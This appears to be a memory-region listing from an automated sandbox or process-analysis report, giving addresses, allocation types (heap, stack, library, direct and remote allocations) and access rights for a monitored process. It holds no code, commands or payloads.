page read and write
2C46000
heap
page read and write
71AE000
stack
page read and write
4EF0000
heap
page read and write
6EA9000
trusted library allocation
page read and write
4F14000
heap
page read and write
7171000
heap
page read and write
75DE000
stack
page read and write
5709000
heap
page read and write
6885000
trusted library allocation
page read and write
7E20000
trusted library allocation
page read and write
6888000
trusted library allocation
page read and write
4DAD000
trusted library allocation
page execute and read and write
3665000
trusted library allocation
page execute and read and write
6EA9000
trusted library allocation
page read and write
70AC000
heap
page read and write
6671000
heap
page read and write
4FAF000
heap
page read and write
3244000
heap
page read and write
55B8000
heap
page read and write
6EA9000
trusted library allocation
page read and write
5200000
heap
page execute and read and write
303A000
heap
page read and write
7387000
heap
page read and write
89F0000
trusted library allocation
page read and write
C461000
trusted library allocation
page read and write
2C5D000
heap
page read and write
DF0000
heap
page read and write
2C67000
heap
page read and write
687E000
trusted library allocation
page read and write
7175000
heap
page read and write
6B5A000
heap
page read and write
6878000
trusted library allocation
page read and write
5D4E000
stack
page read and write
712F000
heap
page read and write
6C2B000
trusted library allocation
page read and write
6888000
trusted library allocation
page read and write
4F19000
heap
page read and write
4C61000
trusted library allocation
page read and write
70226000
unkown
page readonly
5694000
heap
page read and write
58BD000
stack
page read and write
3436000
heap
page read and write
8AF0000
heap
page read and write
7C30000
trusted library allocation
page read and write
6D9A000
heap
page read and write
719F000
heap
page read and write
DE61000
trusted library allocation
page read and write
56FA000
heap
page read and write
6EA9000
trusted library allocation
page read and write
50A4000
heap
page read and write
6EA9000
trusted library allocation
page read and write
832E000
stack
page read and write
30FD000
heap
page read and write
685A000
heap
page read and write
6B7A000
heap
page read and write
6049000
trusted library allocation
page read and write
6B22000
heap
page read and write
4B30000
heap
page read and write
88B0000
trusted library allocation
page read and write
323E000
heap
page read and write
4F34000
heap
page read and write
6888000
trusted library allocation
page read and write
155F000
stack
page read and write
7127000
heap
page read and write
3450000
trusted library allocation
page read and write
6885000
trusted library allocation
page read and write
66E4000
heap
page read and write
786E000
stack
page read and write
322F000
heap
page read and write
717E000
heap
page read and write
712F000
heap
page read and write
2B6F000
heap
page read and write
763A000
trusted library allocation
page read and write
27AB000
stack
page read and write
6B25000
heap
page read and write
940E000
stack
page read and write
6EA9000
trusted library allocation
page read and write
6873000
trusted library allocation
page read and write
6862000
heap
page read and write
52BD000
stack
page read and write
5284000
trusted library allocation
page read and write
3662000
trusted library allocation
page read and write
7446000
heap
page read and write
8AC6000
heap
page read and write
6862000
heap
page read and write
4F1B000
heap
page read and write
771E000
heap
page read and write
4F5E000
stack
page read and write
6827000
heap
page read and write
7E40000
trusted library allocation
page read and write
6B7A000
heap
page read and write
6EA9000
trusted library allocation
page read and write
73FE000
stack
page read and write
6C10000
trusted library allocation
page read and write
6881000
trusted library allocation
page read and write
5010000
heap
page read and write
7AA5000
heap
page read and write
324D000
heap
page read and write
7DF0000
trusted library allocation
page execute and read and write
6B11000
heap
page read and write
7E60000
trusted library allocation
page read and write
84E0000
trusted library allocation
page read and write
3250000
heap
page read and write
354E000
stack
page read and write
2CEA000
stack
page read and write
4C0E000
stack
page read and write
7410000
heap
page execute and read and write
687A000
trusted library allocation
page read and write
32CE000
stack
page read and write
796E000
stack
page read and write
5057000
heap
page read and write
145E000
stack
page read and write
2C77000
heap
page read and write
3409000
heap
page read and write
6C2B000
trusted library allocation
page read and write
719A000
heap
page read and write
4F60000
trusted library allocation
page execute and read and write
73AD000
heap
page read and write
718D000
heap
page read and write
577F000
stack
page read and write
747D000
stack
page read and write
338C000
heap
page read and write
5212000
trusted library allocation
page read and write
475C000
stack
page read and write
6C2B000
trusted library allocation
page read and write
7170000
heap
page read and write
7CC0000
heap
page execute and read and write
7B6D000
heap
page read and write
716A000
heap
page read and write
3223000
heap
page read and write
7DB0000
trusted library allocation
page read and write
6886000
trusted library allocation
page read and write
4620000
trusted library allocation
page read and write
8560000
heap
page read and write
3464000
trusted library allocation
page read and write
3650000
trusted library allocation
page read and write
7772000
heap
page read and write
27E5000
heap
page read and write
51BD000
trusted library allocation
page read and write
6EA9000
trusted library allocation
page read and write
718F000
heap
page read and write
6C17000
trusted library allocation
page read and write
6B37000
heap
page read and write
6371000
trusted library allocation
page read and write
4760000
heap
page read and write
32D3000
heap
page read and write
3640000
trusted library allocation
page read and write
543D000
trusted library allocation
page read and write
2B40000
heap
page read and write
7022D000
unkown
page read and write
2C50000
heap
page read and write
2BE2000
heap
page read and write
67C8000
heap
page read and write
5567000
heap
page read and write
5385000
heap
page read and write
6871000
trusted library allocation
page read and write
718D000
heap
page read and write
55CC000
heap
page read and write
7184000
heap
page read and write
7CA0000
trusted library allocation
page read and write
4F1C000
stack
page read and write
2C6C000
heap
page read and write
5021000
heap
page read and write
7B9D000
heap
page read and write
2E8E000
stack
page read and write
3238000
stack
page read and write
1268000
heap
page read and write
51B3000
trusted library allocation
page read and write
687C000
trusted library allocation
page read and write
7175000
heap
page read and write
6881000
trusted library allocation
page read and write
713C000
heap
page read and write
55C8000
heap
page read and write
734B000
trusted library allocation
page read and write
6518000
trusted library allocation
page read and write
687A000
trusted library allocation
page read and write
6B37000
heap
page read and write
7DD0000
trusted library allocation
page read and write
7BB1000
heap
page read and write
3660000
trusted library allocation
page read and write
35BA000
heap
page read and write
4FFF000
stack
page read and write
6873000
trusted library allocation
page read and write
3229000
heap
page read and write
504B000
heap
page read and write
33FA000
heap
page read and write
56B2000
heap
page read and write
6888000
trusted library allocation
page read and write
1260000
heap
page read and write
324A000
heap
page read and write
6B7A000
heap
page read and write
51DA000
trusted library allocation
page read and write
4609000
trusted library allocation
page read and write
76DF000
stack
page read and write
719A000
heap
page read and write
8AFC000
heap
page read and write
2FCC000
stack
page read and write
8E70000
trusted library allocation
page read and write
685A000
heap
page read and write
7810000
trusted library allocation
page read and write
3228000
heap
page read and write
6EA2000
trusted library allocation
page read and write
6EA2000
trusted library allocation
page read and write
7022D000
unkown
page read and write
33DE000
stack
page read and write
7149000
heap
page read and write
7022F000
unkown
page readonly
70226000
unkown
page readonly
7B12000
trusted library allocation
page read and write
3312000
heap
page read and write
6888000
trusted library allocation
page read and write
323B000
heap
page read and write
4DB0000
trusted library allocation
page read and write
4F7E000
stack
page read and write
2C4D000
heap
page read and write
588B000
stack
page read and write
6C2B000
trusted library allocation
page read and write
6C2B000
trusted library allocation
page read and write
324F000
heap
page read and write
7B00000
heap
page execute and read and write
6885000
trusted library allocation
page read and write
7131000
heap
page read and write
3447000
heap
page read and write
4F6B000
heap
page read and write
76ED000
stack
page read and write
4ED0000
trusted library allocation
page read and write
6881000
trusted library allocation
page read and write
264B000
stack
page read and write
71C4000
heap
page read and write
6CDE000
stack
page read and write
80DE000
stack
page read and write
6C1B000
trusted library allocation
page read and write
4E3E000
stack
page read and write
3385000
heap
page read and write
4AB7000
trusted library allocation
page execute and read and write
66A3000
heap
page read and write
322A000
heap
page read and write
5520000
trusted library allocation
page read and write
719A000
heap
page read and write
4CCE000
stack
page read and write
3235000
heap
page read and write
4F31000
heap
page read and write
7E30000
trusted library allocation
page read and write
7FC88000
trusted library allocation
page execute and read and write
7194000
heap
page read and write
5709000
heap
page read and write
3225000
heap
page read and write
6B25000
heap
page read and write
51A1000
trusted library allocation
page read and write
718F000
heap
page read and write
6B23000
heap
page read and write
6833000
heap
page read and write
322C000
heap
page read and write
6E1E000
stack
page read and write
706E000
stack
page read and write
680E000
trusted library allocation
page read and write
2A20000
heap
page read and write
6C2B000
trusted library allocation
page read and write
75E0000
heap
page read and write
6EA2000
trusted library allocation
page read and write
4EBE000
stack
page read and write
3380000
heap
page read and write
527C000
stack
page read and write
6888000
trusted library allocation
page read and write
7189000
heap
page read and write
7370000
heap
page read and write
6BBA000
heap
page read and write
4660000
trusted library allocation
page execute and read and write
66F0000
heap
page read and write
6885000
trusted library allocation
page read and write
7391000
heap
page read and write
2C61000
heap
page read and write
4600000
trusted library allocation
page read and write
568D000
heap
page read and write
56B3000
heap
page read and write
7171000
heap
page read and write
26B0000
heap
page read and write
3510000
trusted library allocation
page read and write
5530000
heap
page read and write
4D60000
heap
page read and write
7D6E000
stack
page read and write
6BBA000
heap
page read and write
45F0000
trusted library allocation
page read and write
6C2B000
trusted library allocation
page read and write
570E000
heap
page read and write
C71000
heap
page read and write
61C9000
trusted library allocation
page read and write
7640000
trusted library allocation
page read and write
2C46000
heap
page read and write
2C72000
heap
page read and write
2C96000
heap
page read and write
55BA000
heap
page read and write
6C17000
trusted library allocation
page read and write
46BE000
stack
page read and write
80F0000
trusted library allocation
page execute and read and write
5682000
heap
page read and write
6C2B000
trusted library allocation
page read and write
4E90000
heap
page readonly
63D9000
trusted library allocation
page read and write
3610000
trusted library allocation
page read and write
687E000
trusted library allocation
page read and write
26AB000
stack
page read and write
74B0000
trusted library allocation
page read and write
54D7000
trusted library allocation
page read and write
4767000
heap
page read and write
8870000
heap
page read and write
7AE0000
trusted library allocation
page read and write
260E000
stack
page read and write
6C1F000
trusted library allocation
page read and write
3238000
heap
page read and write
8AD5000
heap
page read and write
6B3D000
heap
page read and write
7C50000
trusted library allocation
page execute and read and write
719A000
heap
page read and write
685A000
heap
page read and write
7A2D000
stack
page read and write
500E000
stack
page read and write
66E9000
heap
page read and write
70211000
unkown
page execute read
7609000
trusted library allocation
page read and write
88A0000
heap
page read and write
763E000
stack
page read and write
7600000
trusted library allocation
page read and write
718F000
heap
page read and write
70A0000
direct allocation
page read and write
7820000
trusted library allocation
page execute and read and write
687A000
trusted library allocation
page read and write
56FD000
heap
page read and write
76E0000
heap
page read and write
3229000
heap
page read and write
6C2B000
trusted library allocation
page read and write
2C8A000
heap
page read and write
3623000
trusted library allocation
page execute and read and write
7BFF000
heap
page read and write
7182000
heap
page read and write
7A59000
heap
page read and write
6827000
heap
page read and write
5588000
heap
page read and write
2BE2000
heap
page read and write
718D000
heap
page read and write
2B40000
heap
page read and write
5682000
heap
page read and write
2C75000
heap
page read and write
508E000
stack
page read and write
675C000
heap
page read and write
3256000
heap
page read and write
793E000
stack
page read and write
7EB0000
trusted library allocation
page read and write
52B0000
trusted library allocation
page read and write
6B20000
heap
page read and write
3020000
heap
page read and write
4DA4000
trusted library allocation
page read and write
6881000
trusted library allocation
page read and write
7ABE000
heap
page read and write
7189000
heap
page read and write
55AA000
heap
page read and write
7B3D000
stack
page read and write
584F000
trusted library allocation
page read and write
45F3000
trusted library allocation
page execute and read and write
570E000
heap
page read and write
78EE000
stack
page read and write
6C1F000
trusted library allocation
page read and write
8A60000
heap
page read and write
2C4C000
heap
page read and write
54CF000
trusted library allocation
page read and write
7194000
heap
page read and write
702A000
stack
page read and write
4C50000
heap
page execute and read and write
7132000
heap
page read and write
3110000
heap
page read and write
2C69000
heap
page read and write
6EA9000
trusted library allocation
page read and write
7C40000
trusted library allocation
page read and write
7022D000
unkown
page read and write
719F000
heap
page read and write
6B3D000
heap
page read and write
5703000
heap
page read and write
7D8E000
stack
page read and write
7A23000
heap
page read and write
3280000
heap
page read and write
88FF000
stack
page read and write
4E8E000
stack
page read and write
52D0000
trusted library allocation
page read and write
7134000
heap
page read and write
324C000
heap
page read and write
5593000
heap
page read and write
55A3000
heap
page read and write
2C7D000
heap
page read and write
5703000
heap
page read and write
3249000
heap
page read and write
5689000
heap
page read and write
4CC1000
trusted library allocation
page read and write
6EA2000
trusted library allocation
page read and write
5224000
heap
page read and write
2DE6000
stack
page read and write
4AF0000
trusted library allocation
page read and write
7B41000
heap
page read and write
769E000
stack
page read and write
2E00000
heap
page read and write
8B14000
heap
page read and write
6863000
heap
page read and write
8B0A000
heap
page read and write
70210000
unkown
page readonly
7E10000
trusted library allocation
page read and write
6B23000
heap
page read and write
7342000
trusted library allocation
page read and write
53D0000
heap
page read and write
5565000
heap
page read and write
570E000
heap
page read and write
3550000
heap
page read and write
7040000
direct allocation
page read and write
4DD2000
trusted library allocation
page read and write
681B000
heap
page read and write
687E000
trusted library allocation
page read and write
7440000
trusted library allocation
page read and write
5297000
heap
page read and write
504E000
stack
page read and write
8980000
heap
page read and write
6A4D000
heap
page read and write
2C46000
heap
page read and write
3390000
heap
page read and write
6B35000
heap
page read and write
CAD000
stack
page read and write
6B3D000
heap
page read and write
46FF000
stack
page read and write
7194000
heap
page read and write
687E000
trusted library allocation
page read and write
66E4000
heap
page read and write
7A40000
trusted library allocation
page read and write
4B1E000
stack
page read and write
2C29000
heap
page read and write
DD0000
heap
page read and write
74FE000
stack
page read and write
4A99000
trusted library allocation
page read and write
7AC0000
trusted library allocation
page read and write
8340000
heap
page read and write
7C40000
trusted library allocation
page read and write
7CB0000
trusted library allocation
page read and write
2C3F000
stack
page read and write
33CE000
stack
page read and write
29BF000
stack
page read and write
6EA2000
trusted library allocation
page read and write
6C2B000
trusted library allocation
page read and write
814F000
stack
page read and write
7E00000
trusted library allocation
page read and write
5380000
heap
page read and write
687A000
trusted library allocation
page read and write
7CAA000
trusted library allocation
page read and write
3477000
heap
page read and write
7B87000
heap
page read and write
7080000
direct allocation
page read and write
7A6C000
trusted library allocation
page read and write
2C5D000
heap
page read and write
2B49000
heap
page read and write
71D3000
heap
page read and write
6C1B000
trusted library allocation
page read and write
47F0000
heap
page read and write
6B27000
heap
page read and write
55A1000
heap
page read and write
7040000
heap
page read and write
6C17000
trusted library allocation
page read and write
6C1F000
trusted library allocation
page read and write
6EA9000
trusted library allocation
page read and write
83CE000
stack
page read and write
7189000
heap
page read and write
79EE000
stack
page read and write
70210000
unkown
page readonly
6B1C000
heap
page read and write
719F000
heap
page read and write
17F0000
heap
page read and write
6F10000
trusted library allocation
page read and write
4F4D000
heap
page read and write
76EE000
stack
page read and write
2CE8000
stack
page read and write
76AB000
stack
page read and write
2C81000
heap
page read and write
7780000
heap
page read and write
6EA2000
trusted library allocation
page read and write
896E000
stack
page read and write
70EE000
stack
page read and write
6041000
trusted library allocation
page read and write
5689000
heap
page read and write
7841000
heap
page read and write
333E000
unkown
page read and write
6810000
heap
page read and write
6EA9000
trusted library allocation
page read and write
3230000
heap
page read and write
2C5D000
heap
page read and write
32E0000
heap
page read and write
745F000
stack
page read and write
2BA9000
heap
page read and write
5709000
heap
page read and write
6C2B000
trusted library allocation
page read and write
2C75000
heap
page read and write
3244000
heap
page read and write
6515000
trusted library allocation
page read and write
8ABA000
heap
page read and write
7A60000
trusted library allocation
page read and write
5436000
trusted library allocation
page read and write
29FD000
stack
page read and write
797E000
stack
page read and write
6881000
trusted library allocation
page read and write
79AF000
stack
page read and write
5705000
heap
page read and write
30D6000
heap
page read and write
7610000
trusted library allocation
page read and write
7022D000
unkown
page read and write
8AE7000
heap
page read and write
687E000
trusted library allocation
page read and write
56FD000
heap
page read and write
51BE000
stack
page read and write
78AE000
stack
page read and write
4715000
trusted library allocation
page read and write
4F6B000
heap
page read and write
7DC0000
trusted library allocation
page execute and read and write
3620000
trusted library allocation
page read and write
5360000
heap
page read and write
8ACB000
heap
page read and write
7340000
trusted library allocation
page read and write
60A8000
trusted library allocation
page read and write
3288000
heap
page read and write
7124000
heap
page read and write
5371000
trusted library allocation
page read and write
5709000
heap
page read and write
7189000
heap
page read and write
5552000
heap
page read and write
5293000
heap
page read and write
33FE000
heap
page read and write
4F23000
heap
page read and write
4AB5000
trusted library allocation
page execute and read and write
7194000
heap
page read and write
4DCF000
stack
page read and write
2BB1000
heap
page read and write
30F9000
heap
page read and write
31E8000
heap
page read and write
2C66000
heap
page read and write
7086000
direct allocation
page read and write
7146000
heap
page read and write
2FFC000
stack
page read and write
6B35000
heap
page read and write
6876000
trusted library allocation
page read and write
6888000
trusted library allocation
page read and write
305D000
heap
page read and write
5611000
heap
page read and write
687E000
trusted library allocation
page read and write
838E000
stack
page read and write
6504000
trusted library allocation
page read and write
54C6000
trusted library allocation
page read and write
6882000
trusted library allocation
page read and write
6EA2000
trusted library allocation
page read and write
7DAD000
stack
page read and write
35DE000
stack
page read and write
5700000
heap
page read and write
80E0000
heap
page read and write
32CA000
heap
page read and write
6B2B000
heap
page read and write
4DB8000
trusted library allocation
page read and write
753D000
stack
page read and write
6885000
trusted library allocation
page read and write
6888000
trusted library allocation
page read and write
3687000
heap
page read and write
2DEE000
stack
page read and write
620A000
trusted library allocation
page read and write
6C1F000
trusted library allocation
page read and write
687E000
trusted library allocation
page read and write
6834000
heap
page read and write
56A0000
heap
page read and write
749E000
stack
page read and write
554D000
heap
page read and write
6524000
trusted library allocation
page read and write
DCE000
stack
page read and write
7CEE000
stack
page read and write
2C78000
heap
page read and write
7E30000
trusted library allocation
page read and write
714E000
direct allocation
page read and write
6FEE000
stack
page read and write
3420000
heap
page read and write
66E0000
heap
page read and write
687C000
trusted library allocation
page read and write
555D000
heap
page read and write
6B37000
heap
page read and write
6DAB000
stack
page read and write
5278000
trusted library allocation
page read and write
4AEE000
stack
page read and write
4F63000
heap
page read and write
76AE000
stack
page read and write
2F10000
heap
page read and write
88A0000
trusted library allocation
page read and write
762F000
stack
page read and write
6858000
heap
page read and write
687C000
trusted library allocation
page read and write
2C7F000
stack
page read and write
6E6E000
stack
page read and write
6885000
trusted library allocation
page read and write
7140000
direct allocation
page read and write
33D8000
heap
page read and write
6EA2000
trusted library allocation
page read and write
2C74000
heap
page read and write
66E9000
heap
page read and write
50A6000
heap
page read and write
2C7C000
heap
page read and write
682A000
heap
page read and write
718D000
heap
page read and write
75FD000
trusted library allocation
page read and write
5040000
heap
page read and write
6888000
trusted library allocation
page read and write
527B000
trusted library allocation
page read and write
6875000
trusted library allocation
page read and write
712E000
stack
page read and write
4F68000
heap
page read and write
6C2B000
trusted library allocation
page read and write
73BE000
stack
page read and write
7A41000
heap
page read and write
6885000
trusted library allocation
page read and write
61A1000
trusted library allocation
page read and write
717E000
heap
page read and write
7194000
heap
page read and write
7148000
heap
page read and write
331C000
heap
page read and write
6EB0000
trusted library allocation
page read and write
6934000
heap
page read and write
27E0000
heap
page read and write
774A000
heap
page read and write
8E00000
trusted library allocation
page read and write
8C90000
trusted library allocation
page read and write
2C5F000
heap
page read and write
4A90000
trusted library allocation
page read and write
675B000
heap
page read and write
6877000
trusted library allocation
page read and write
4610000
trusted library allocation
page read and write
6C1F000
trusted library allocation
page read and write
7A50000
trusted library allocation
page read and write
4F6B000
heap
page read and write
2AFF000
stack
page read and write
4F70000
trusted library allocation
page read and write
773B000
heap
page read and write
7E70000
trusted library allocation
page read and write
74A0000
heap
page execute and read and write
6860000
heap
page read and write
78BE000
stack
page read and write
7122000
heap
page read and write
3225000
heap
page read and write
4700000
trusted library allocation
page read and write
7C4D000
trusted library allocation
page read and write
6EA2000
trusted library allocation
page read and write
7B97000
heap
page read and write
7129000
heap
page read and write
84F0000
trusted library allocation
page read and write
9A0000
heap
page read and write
56A0000
heap
page read and write
53ED000
trusted library allocation
page read and write
89CE000
stack
page read and write
7082000
direct allocation
page read and write
7BAC000
heap
page read and write
7175000
heap
page read and write
4D90000
trusted library allocation
page read and write
7C50000
trusted library section
page read and write
6FA8000
heap
page read and write
4DB9000
trusted library allocation
page read and write
6B24000
heap
page read and write
34CA000
heap
page read and write
7131000
heap
page read and write
7184000
heap
page read and write
554C000
heap
page read and write
6B10000
heap
page read and write
2C60000
heap
page read and write
719A000
heap
page read and write
52C0000
trusted library allocation
page execute and read and write
4B4E000
stack
page read and write
712F000
heap
page read and write
4E40000
heap
page read and write
4711000
trusted library allocation
page read and write
2C64000
heap
page read and write
2C74000
heap
page read and write
4640000
trusted library allocation
page read and write
6C2B000
trusted library allocation
page read and write
AE0000
heap
page read and write
4F10000
heap
page read and write
32FD000
unkown
page read and write
45F4000
trusted library allocation
page read and write
3248000
heap
page read and write
AE61000
trusted library allocation
page read and write
682A000
heap
page read and write
3025000
heap
page read and write
539E000
stack
page read and write
70211000
unkown
page execute read
4F6B000
heap
page read and write
84D0000
trusted library allocation
page execute and read and write
2C78000
heap
page read and write
33D0000
heap
page read and write
75D0000
trusted library allocation
page read and write
5180000
trusted library allocation
page read and write
4E47000
heap
page read and write
54DE000
stack
page read and write
2CAC000
stack
page read and write
4F2C000
heap
page read and write
473000
remote allocation
page execute and read and write
51F0000
heap
page read and write
6825000
heap
page read and write
7157000
heap
page read and write
476000
remote allocation
page execute and read and write
2CED000
stack
page read and write
70E0000
direct allocation
page read and write
2C83000
heap
page read and write
32CA000
heap
page read and write
89BE000
stack
page read and write
6819000
heap
page read and write
717E000
heap
page read and write
5287000
trusted library allocation
page read and write
3470000
heap
page read and write
70226000
unkown
page readonly
6EA9000
trusted library allocation
page read and write
4AB2000
trusted library allocation
page read and write
7630000
trusted library allocation
page read and write
75AB000
stack
page read and write
6C2B000
trusted library allocation
page read and write
54E7000
trusted library allocation
page read and write
5705000
heap
page read and write
66E9000
heap
page read and write
35B0000
heap
page read and write
778A000
heap
page read and write
324B000
heap
page read and write
753B000
heap
page read and write
8A6B000
stack
page read and write
8160000
trusted library allocation
page read and write
7ABB000
heap
page read and write
7022F000
unkown
page readonly
570E000
heap
page read and write
114E000
stack
page read and write
511E000
stack
page read and write
2BB1000
heap
page read and write
6B21000
heap
page read and write
8970000
heap
page read and write
45FD000
trusted library allocation
page execute and read and write
75A0000
trusted library allocation
page read and write
8A20000
heap
page read and write
6B59000
heap
page read and write
7D2E000
stack
page read and write
718D000
heap
page read and write
6EAA000
stack
page read and write
2B1E000
stack
page read and write
7171000
heap
page read and write
7D4F000
stack
page read and write
330E000
heap
page read and write
C66000
heap
page read and write
765E000
stack
page read and write
7730000
heap
page read and write
35E0000
heap
page read and write
5538000
heap
page read and write
6860000
heap
page read and write
74BE000
stack
page read and write
75E0000
trusted library allocation
page read and write
2AD0000
heap
page read and write
2C54000
heap
page read and write
31C0000
heap
page read and write
6881000
trusted library allocation
page read and write
7780000
heap
page read and write
56D7000
heap
page read and write
6875000
heap
page read and write
55C8000
heap
page read and write
51FF000
stack
page read and write
7DE0000
trusted library allocation
page read and write
6EA2000
trusted library allocation
page read and write
7374000
heap
page read and write
3249000
heap
page read and write
D80000
heap
page read and write
53B8000
trusted library allocation
page read and write
2B20000
heap
page read and write
2E08000
heap
page read and write
8100000
heap
page read and write
4BC0000
heap
page execute and read and write
6A30000
heap
page read and write
7620000
trusted library allocation
page read and write
4C4E000
stack
page read and write
70BE000
heap
page read and write
6EA9000
trusted library allocation
page read and write
6888000
trusted library allocation
page read and write
31E0000
heap
page read and write
766D000
stack
page read and write
4FAB000
heap
page read and write
55B8000
heap
page read and write
6888000
trusted library allocation
page read and write
66E9000
heap
page read and write
2C6A000
heap
page read and write
6EA9000
trusted library allocation
page read and write
515E000
stack
page read and write
7A80000
trusted library allocation
page read and write
2C4F000
heap
page read and write
718F000
heap
page read and write
3254000
heap
page read and write
5700000
heap
page read and write
B461000
trusted library allocation
page read and write
34A8000
heap
page read and write
7126000
heap
page read and write
2BB6000
heap
page read and write
5610000
heap
page read and write
718D000
heap
page read and write
5594000
trusted library allocation
page read and write
70210000
unkown
page readonly
719A000
heap
page read and write
6EA2000
trusted library allocation
page read and write
792E000
stack
page read and write
6B15000
heap
page read and write
3748000
heap
page read and write
7E50000
trusted library allocation
page read and write
584F000
stack
page read and write
324E000
heap
page read and write
3460000
trusted library allocation
page read and write
773E000
stack
page read and write
5652000
heap
page read and write
75EE000
stack
page read and write
7A72000
heap
page read and write
3279000
heap
page read and write
5573000
heap
page read and write
2C89000
heap
page read and write
6B5B000
heap
page read and write
6B21000
heap
page read and write
2D8E000
stack
page read and write
317E000
stack
page read and write
6B7A000
heap
page read and write
756D000
stack
page read and write
110E000
stack
page read and write
A461000
trusted library allocation
page read and write
7AB0000
trusted library allocation
page read and write
2BC0000
heap
page read and write
7EC0000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
3243000
heap
page read and write
6C1F000
trusted library allocation
page read and write
2C10000
heap
page read and write
2C4F000
heap
page read and write
7790000
heap
page read and write
55BA000
heap
page read and write
4850000
heap
page read and write
7182000
heap
page read and write
7378000
heap
page read and write
7785000
heap
page read and write
7CA7000
trusted library allocation
page read and write
C57000
heap
page read and write
5190000
heap
page execute and read and write
322E000
heap
page read and write
8AC1000
heap
page read and write
2BED000
heap
page read and write
7E90000
trusted library allocation
page read and write
568D000
heap
page read and write
7A70000
trusted library allocation
page read and write
30F6000
heap
page read and write
687C000
trusted library allocation
page read and write
8C80000
trusted library allocation
page execute and read and write
5DD0000
trusted library allocation
page read and write
5A2F000
stack
page read and write
2A78000
stack
page read and write
6EA9000
trusted library allocation
page read and write
7171000
heap
page read and write
7184000
heap
page read and write
6888000
trusted library allocation
page read and write
365A000
trusted library allocation
page execute and read and write
6888000
trusted library allocation
page read and write
2B3E000
stack
page read and write
50CE000
stack
page read and write
2DF0000
heap
page read and write
71A0000
heap
page read and write
2BB0000
heap
page read and write
719A000
heap
page read and write
6B25000
heap
page read and write
50D0000
heap
page execute and read and write
6DB0000
trusted library allocation
page read and write
9411000
trusted library allocation
page read and write
56FD000
heap
page read and write
6DC0000
trusted library allocation
page read and write
7184000
heap
page read and write
73EE000
stack
page read and write
6C2B000
trusted library allocation
page read and write
4F6B000
heap
page read and write
66E1000
heap
page read and write
7AD0000
trusted library allocation
page read and write
324E000
stack
page read and write
75FF000
trusted library allocation
page read and write
1150000
heap
page read and write
3630000
heap
page read and write
7120000
direct allocation
page read and write
2C70000
heap
page read and write
324C000
heap
page read and write
2BB7000
heap
page read and write
BE61000
trusted library allocation
page read and write
2C5F000
heap
page read and write
34DF000
stack
page read and write
6881000
trusted library allocation
page read and write
7660000
trusted library allocation
page read and write
55B8000
heap
page read and write
7E00000
trusted library allocation
page read and write
2C0E000
heap
page read and write
716E000
stack
page read and write
8150000
trusted library allocation
page read and write
34BA000
heap
page read and write
6C1F000
trusted library allocation
page read and write
6EA9000
trusted library allocation
page read and write
719A000
heap
page read and write
55B6000
heap
page read and write
6B37000
heap
page read and write
76FB000
stack
page read and write
5B12000
trusted library allocation
page read and write
5170000
trusted library allocation
page read and write
83C000
stack
page read and write
6819000
heap
page read and write
3463000
trusted library allocation
page execute and read and write
743E000
stack
page read and write
5550000
heap
page read and write
32D0000
heap
page read and write
5228000
trusted library allocation
page read and write
5220000
heap
page read and write
7E20000
trusted library allocation
page read and write
550D000
trusted library allocation
page read and write
6069000
trusted library allocation
page read and write
75A0000
trusted library allocation
page read and write
726E000
stack
page read and write
6C2B000
trusted library allocation
page read and write
6C2B000
trusted library allocation
page read and write
2B3E000
stack
page read and write
767A000
stack
page read and write
323A000
heap
page read and write
4ED4000
trusted library allocation
page read and write
6881000
trusted library allocation
page read and write
7740000
heap
page read and write
753E000
stack
page read and write
7BE1000
heap
page read and write
73BD000
heap
page read and write
714E000
direct allocation
page read and write
7129000
heap
page read and write
5C69000
trusted library allocation
page read and write
6C2B000
trusted library allocation
page read and write
9E11000
trusted library allocation
page read and write
8AA2000
heap
page read and write
4DD0000
trusted library allocation
page read and write
6B32000
heap
page read and write
58E5000
trusted library allocation
page read and write
5290000
heap
page read and write
3740000
heap
page read and write
6EA2000
trusted library allocation
page read and write
5652000
heap
page read and write
718F000
heap
page read and write
7469000
heap
page read and write
3340000
heap
page read and write
6B27000
heap
page read and write
4FC0000
heap
page read and write
7252000
heap
page read and write
6881000
trusted library allocation
page read and write
6C1F000
trusted library allocation
page read and write
7182000
heap
page read and write
7119000
heap
page read and write
2C66000
heap
page read and write
5703000
heap
page read and write
7AAE000
heap
page read and write
30BD000
heap
page read and write
32E9000
heap
page read and write
6DD0000
trusted library allocation
page read and write
5705000
heap
page read and write
6888000
trusted library allocation
page read and write
7BD5000
heap
page read and write
7350000
heap
page execute and read and write
3680000
heap
page read and write
893E000
stack
page read and write
67EB000
heap
page read and write
7E40000
trusted library allocation
page read and write
66E4000
heap
page read and write
4B8F000
stack
page read and write
4AD0000
trusted library allocation
page read and write
2B6B000
heap
page read and write
67EB000
heap
page read and write
D1A000
stack
page read and write
651C000
trusted library allocation
page read and write
7100000
direct allocation
page read and write
4DA3000
trusted library allocation
page execute and read and write
362D000
trusted library allocation
page execute and read and write
8060000
trusted library allocation
page read and write
2B5E000
heap
page read and write
8AB0000
heap
page read and write
75D0000
trusted library allocation
page read and write
45E0000
trusted library allocation
page read and write
6EA9000
trusted library allocation
page read and write
83D1000
trusted library allocation
page read and write
6885000
trusted library allocation
page read and write
6EA2000
trusted library allocation
page read and write
6885000
trusted library allocation
page read and write
AD0000
heap
page read and write
There are 1340 hidden memdumps, click here to show them.